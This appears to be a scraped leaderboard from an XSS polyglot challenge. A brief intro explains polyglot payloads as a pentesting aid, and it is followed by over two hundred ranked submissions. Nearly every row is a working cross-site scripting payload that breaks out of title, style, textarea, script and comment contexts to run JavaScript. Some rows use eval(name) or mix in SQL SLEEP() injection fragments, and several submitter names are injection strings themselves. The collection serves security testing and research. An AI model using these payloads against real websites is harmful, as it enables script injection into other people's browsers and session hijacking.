What is a XSS Polyglot payload?

A XSS payload which can be executed in multiple contexts. For example, onclick=alert() can be executed in <div onclick=alert()> and <script>onclick=alert()</script>. It is useful in pentests because it reduces the noise and minimizes the effort to test. More information

Rules and Stuff

Contexts

Leaderboard

# Name Contexts (≥ 3) Characters Payload
1@orenhafif1687javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
2@molnar_g1687javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
3@0xSobky1687jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*" %0A oNcliCk=alert()//>x
4Anonymous1687jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*" %0A oNcliCk=alert()//>x
5Ctrl1687javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
6ez1687javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
7cgvwzq1688javascript://</title>"/</script></style></textarea/-->*/<alert()/*' %0D %0A onclick=alert()//>/
8testing1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
9<pewpew>1688javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
10Nicob1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
11guiltyspark1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
12hac1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
13Test1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
14uj1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
15moohy1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
16test11688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
17zzzz1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
18name1688javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
19@_batram1689javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
20"><img src=x on1689 %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
21therealsphinx1689 %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
22@therealsphinx1689 %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
23tesdt1689 %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
24@SecurityMB1690javascript://'//" %0A --></textarea></style></script></title><b onclick= %0A alert()//>*/alert()/*
25tr3w1693javascript://</title></textarea></style></script --><li '//" %0A '*/alert()/*', onclick=alert()//
26@samuirai1696javascript:alert()//--></script></textarea></style></title><a"//' %0D %0A onclick=alert()//>*/alert()/*
27@molnar_g 151574--></script></title></style>"/</textarea><a' %0A onclick=alert()//>*/alert()/*
28@orenhafif 151575/</title/'/</style/</script/</textarea/--><p" %0A onclick=alert()//>*/alert()/*
29phreedom1577//'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
30sani1587avascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
31Hh1588javascript:alert()//</title></textarea></style></script --><svg '//" %0D %0A onclick=alert()//>
32@Gunther_AR15116javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
33@orenhafif 141464/</title/'/</style/</script/--><p" %0A onclick=alert()//>*/alert()/*
34adcvg1466 %09 /</title/'/</style/</script/--><p" %0D %0A onclick=alert()//>*/alert()/*
35@repadyuri1498javascript:alert()//"//' %0D %0A onclick=alert()//--></style></script><script>alert()</script>*/alert()/*
36@garethheyes14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
37aaa14123javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
38codedbrain14123javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
39grosjean14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
40sfs14123javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
41javascript:aler14123javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
42asda14123javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
43javascript:/*--14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
44hamara14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
45anna14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
46GOODiny14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
47Tester14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
48fd14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
49hgh14123javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
50t1395javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
51xexexe1395javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
52doglife1395javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
53Hussain1397javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* %0D %0A
54Ronan1397javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* %0D %0A
55avlidienbrunn13101javascript:alert(1)//'//"//</script><script>alert(1)</script>--><div %0D %0A onclick=alert(1)//*/alert(1)/*>
56eee13103javascript:alert(1)//}</style></title></textarea></script>--><button '" onclick=alert(1)//>*/alert()/*
57lol13103javascript:alert()//--></script></textarea></style></title><a"//' %0D %0A onclick=alert()//>*/alert()/*
58@thegrayone_113108javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() %0D %0A alert()
59Nope13115javascript:alert()//';alert();'";alert()//</script> onclick=alert() --></title><script>alert()</script>*/alert() /*
60adcv13120<script>/* \n{{ %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*}} \n*/</script>
61xx13144jaVasCript:/*-/*`/*\`/*'/*"/**/( oNmouseover=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
62jaVasCript:/*-/13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
63ert113144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
64ert13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
650xsobky13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
66radegast13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
67test213144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
68NaN13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
69asd13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
70xsshunter13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
71faker13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
72huandd13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
73g13144jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
74denny13146jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eT>
75D1287javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>
76zzz1290javascript://'/</title></style></textarea></script>--><p"%0A onclick=alert()//>*/alert()/*
77aabbccdd1290javascript://--></script></title></style>"/</textarea>*/<alert()/*'%0A onclick=alert()//>a
78 javascript://'1290javascript://'/</title></style></textarea></script>--><p"%0A onclick=alert()//>*/alert()/*
79)/*1290jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*"%0A oNcliCk=alert()//>x
80janusz1290javascript://'/</title></style></textarea></script>--><p"%0A onclick=alert()//>*/alert()/*
81foo1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
82justest1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
83e1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
84@Maxy1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
85as1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
86javascript://'/1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
87pewpew!1291javascript:alert();//'"</title></style></textarea></script/--><a/%0d%0a onclick=alert()//>x
88tet1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
89zzzzz1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
90qwer41291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
91jj1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
92<div>{{payload}1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
93p0lygl0t1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
94asdasd1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
95tanner1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
96xd1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
97tehisreal1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
98x1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
99var str = "jaVa1291javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
100jk1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
101Zeeshan1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
102harish1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
103karan johar1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
104kol1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
105a1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
106121291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
107goo1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
108check1291javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
109aa1291javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
110Roman1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
111QAsMD1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
112tes1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
113<svg onload=" %1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
114ashok1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
115snazzysanoj1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
116onclick=alert(01291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
117cucrisis1291javascript://'/</title></style></textarea></script>--><a" %0A onclick=alert()//>*/alert()/*
118hp1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
119testytesty1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
120qwe1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
121v1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
122dadad1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
123some1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
124r00tuser1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
125jhk1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
126tony1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
127balls1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
128tom1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
129vc1291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
1301231291javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
131sahil1292 %09 javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
132<<SCRIPT>alert(1292 %09 javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
133llolol1292 %09 javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
134hello1293javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* %0D %0A
135blindfuzzy1293javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* %0D %0A
136SJ1293javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a %0D %0A
137hrj1293javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* %0D %0A
138redhunter1293javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* %0D %0A
139javascript1293javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* %0D %0A
140durg781294javascript://--></script></title></style>/"</textarea>/'/*/<alert()/*' %0A onclick=alert()//>a
141xxx1295javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
142q1295javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
143binu-test1296javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
144 javascript://-1296 %09 javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
145javascript://</1296javascript://</title>"/</script></style></textarea/-->*/<alert()/*' %0D %0A onclick=alert()//>/
146aaaaa1297javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* zzzzz
147ss12111javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() alert() %0D %0A %0D %0A
148<input type="te12148 %0D %0A %0D %0A jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
149Brian Bo1175/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
150/</title/'/</st1175/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
151vd1175/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
152--></script></t1177/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* %0D %0A
153pew...pew1179alert();//'"--></title></style></textarea></script><a%0d%0A onclick=alert()//>x
154ee1180//'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
155foobar1182javascript://--></script></textarea></title></style><hr onclick= %0D %0A onclick=alert()
156maxybeass1183javascript://'/</style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
157pewpew!!1183javascript://'"</title></style></textarea></script/--><a/%0d%0a onclick=alert()//>x
158pewpew1184javascript://*'"/</title></style></textarea></script>--><a%0A onclick=alert()//%0A>x
159javascript:1185//</title>"/</script></style></textarea/-->*/<alert()/*' %0D %0A onclick=alert()//>/
160-1185javascript://'/</title></style></textarea></script>--><p" %0A ONCLICK=alert('๐Ÿ‹')//>a
161Jiff1186avascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
162zxczxczxc1186javascript://'</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
163@dz-samir1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
164dd1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
165@testq1187javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>d
166z1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
167wfwf1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
168aaaa1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
169nani1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
170techme1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
171ะฐัะด1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
172anonghost1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
173snyff1187javascript:/*'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
174hi1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
175Corb3nik1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
176rrr1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
177Hellofuckyeah1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
178ZAz1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
179a11187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
180sdf1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
181webdiamond71187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
182Boh1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
183<!'/*!"/*!\'/*\1187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
18411187javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
185sss1189javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* %0D %0A
186SiMpS0N1191<q/oncut=alert()</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/*
187Daniele1191javascript://'/</title></style></textarea>>/script>--><p" %0A onclick=alert()//>*/alert()/*
188ff1191javascript://'/>/title></style></textarea></script>--><p "%0A onclick=alert()//>*/alert()/*
189pewpew!!!1191javascript:alert()/*"'</title></style></textarea></script/-->*/<a%0d%0a onclick=alert()//>x
190dsopas1192javascript://'</div></title></textarea></style></script>--><x" onclick=alert()//>*/alert()/*
191hala11108var ()=\`\`;javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
192Myth11115'"onerror=alert(1);>javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
193ABOUKIR11146jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e %0D %0A
194IngoPan11370<!--<textarea alt='jaVasCript:/*-/*`/*\`/*'/*"/**/(/*' */oNcliCk=alert(6) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(2)//>\x3e>xxx</textarea>;'#"><!-- <textarea alt='jaVasCript:/*-/*`/*\`/*'/*"/**/(/*' */oNcliCk=alert(6) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(2)//>\x3e>xxx</textarea-->
195john6ds1068/</title/'/</style/</script/--><p" %0A onclick=alert()//>*/alert()/*
196jibblets10820x0://'/</title></style></textarea></script>--><p"/onclick %0D %0A =alert()//>*/alert()/*
1970x11088javascript://'/</title></style></textarea></script>--><svg onclick=alert()//>*/alert()/*
198@i_bo0om1089javascript://'/</title></style></textarea</script--><q" %0a onclick=alert()//>*/alert()/*
199test_pt1091javascript://'/</div></title></textarea></div></script>--><p" onclick=alert()//>*/alert()/*
2000x21096javascript://'/</title></style></textarea><svg" onclick=alert()//></script>-->*/alert()/*
201fida hussain10209<svg onload=" %0D %0A %0D %0A void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; %0D %0A %0D %0A "></svg> %0D %0A
202lz970/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*/****/
203dth983</script>-->alert()"';alert();'<script>alert()</script> onclick=alert() */alert()/*
204xorb996'|alert()|'+"|alert()|";alert()//</noscript></script></title></textarea>%0a<svg/onclick=alert()>
205'|alert()|'+"|a996'|alert()|'+"|alert()|";alert()//</noscript></script></title></textarea>%0a<svg/onclick=alert()>
206Lolz997';alert();'"</script><p onclick=alert()> onclick=alert() />--><script>alert()</script>*/alert()/*
207butt9101javascript:/*--></textarea></style></button></script></meta><select/onclick='+/"/+/[*/[]/+alert()//'>
208peter9108*/alert()/*\*'\"--></style></script><script>alert()</script><img src=x onclick=alert()><div onclick=alert()>
209dison9108*/alert()/*\*'\"--></style></script><script>alert()</script><img src=x onclick=alert()><div onclick=alert()>
210ak1t49113javascript:alert(1);"; onclick=alert(1);// '; onclick=alert(1);//--></style></script><button onclick=alert(1);> %0D %0A
211@Caspian_CTF9139onclick=alert()//<b onclick=alert()//>*/alert()//'"--></style><SCRIPT>alert()</SCRIPT><div>onclick=alert()//<b' onclick=alert()//>*/alert()
212Kornel883javascript:/*--></textarea></script></title></style><svg onload="alert()">*/alert()
213tst885javascript:alert();//</script></textarea></title></style>%0d%0a<x onclick=alert()//>x
214/*! SLEEP(1) /*8188/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"/**/ /*!/*/ // /*/*/
215llll8225javascript:/*--></script>">[img=1]<img -/style=-=expression(/*โ€™/-/*',/**/alert()//);-o-link:javascript:eval(title);-o-link-source:current onclick=alert() background=javascript:alert()>"<svg onclick=alert()>
216darten8528<input onclick=alert() onfocus=onclick() onload=onclick() onblur=onclick()><object onclick=alert()>javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*โ€™/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
217Jimeno8528<input onclick=alert() onfocus=onclick() onload=onclick() onblur=onclick()><object onclick=alert()>javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*โ€™/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
218373rn417128<script>alert()</script>//<svg/onload=alert()>//<a class="" onclick=alert(1)//<button value=test 'onclick=alert()//>*/alert();/*
219P3t3_r3c0n7160"onclick=alert()//<svg/onclick=alert()//'onclick=alert()//<id onclick=alert()//";onclick=alert()//</style onclick=alert()//</script><svg '//" onclick=alert(1)//
220<button '" oncl641<button '" onclick=alert(1)//>*/alert()/*
221bibo660alert(1)//"' ;alert(1)//onclick=alert(1) '" onclick=alert(1)
222@prinzhorn666--></title></style></textarea></script>"//'//><svg/onload=alert()>
223ewew685 ' onclick=alert();//'"></title></script></iframe></textarea><body onclick="alert()">
224xo694"|alert()|" ' onclick=alert();//'</title></script></iframe></textarea><body onclick="alert()">
225b1gdumpy696javascript://'/</title></style></textarea></script>--><select %0D %0A */onclick=alert()><o>1<o>'//"<!--
226DarkDrag0nite699alert();-->*/"/'</script>/alert()/onclick=alert()'"</title></textarea></style><p onclick=alert()>a'
227ank6104';alert()//';alert()//";alert()//";alert(String.fromCharCode()//--></SCRIPT>">'><SCRIPT>alert()</SCRIPT>
228'"><img/src=x>6116xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ' onclick=alert();//'"></title></script></iframe></textarea><body onclick="alert()">
229dawnray6121eval('alert()')//<div onclick=alert()><img src=1 onerror=alert()><script>alert()</script><a href=javascript:alert()>a</a>
2300xroot6175/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"โ€จ /*
231@0xroot6175/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"โ€จ /*
232';alert(String.6229';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
233/ยด`'*--\\'">jav6421/ยด`'*--\\'">javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*โ€™/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
234BlackFan562javascript:alert()//<svg/onload=alert()>'-alert("-alert()-")-'
235januszek576/*--></title></textarea><a href="javascript:alert(1)">xss</a><!--*/alert(1);
236testerino583<!--/*--><![CDATA[/*>"'</textarea></div></title></script><a onclick=alert()>x<!--*/
237mtk0308586<a id='' onclick=alert()> %0D %0A <script>alert()</script> %0D %0A <input onfocus=alert() autofocus>
238 5121" onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//>
239 jimeno5121" onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//>
240 " onfocus=aler5135 %09 " onfocus=alert(1); " %0D %0A " onfocus=alert(1); " <a href="javascript://'/</title></style></textarea></script>--><p onclick=alert(1)>XXX #
241" onfocus=alert5139" onfocus=alert(1); " %0D %0A " onfocus=alert(1); " <a href="javascript://'/</title></style></textarea></script>--><p onclick=alert(1)>XXX %0D %0A %0D %0A # %0D %0A
242@P_Fischbeck428"a"; */ onclick=alert(); /*
243<button ' oncli441<button ' onclick=alert(1)//>*/alert(1)//
